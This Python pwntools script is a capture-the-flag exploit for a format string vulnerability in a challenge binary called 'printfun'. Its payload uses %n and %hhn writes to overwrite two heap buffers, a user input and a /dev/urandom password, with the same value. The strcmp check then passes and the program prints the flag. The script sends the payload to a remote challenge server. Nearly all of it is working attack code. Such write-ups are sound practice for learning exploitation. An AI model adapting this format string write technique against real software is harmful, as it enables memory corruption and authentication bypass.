#!/usr/bin/python3

from pwn import *
import sys

#context.log_level = 'debug'

"""
a successful comparison of 
strcmp(/dev/urandom, user_input)
will result in system("/bin/cat ./flag.txt")

so we use the format string bug to write the same
value to both buffers in the heap
"""

# our format string is on the heap, but printf() bug will act on the stack

fmt_str = b""
fmt_str += b"%255u"
fmt_str += b"%06$n" # 0x5655a1b0 points to our buffer in the heap
fmt_str += b"%07$n" # 0x5655a160 points to "password" generated by /dev/urandom in the heap
# $n will do a four-byte write that clears the two buffers
# $hhn will write truncate and write the same value
fmt_str += b"%06$hhn"
fmt_str += b"%07$hhn"

def main():
    global fmt_str

    #target = process("./printfun")
    target = remote("chal.tuctf.com", 30501)

    target.recvuntil(b"? ")
    target.sendline(fmt_str)

    target.interactive()

main()
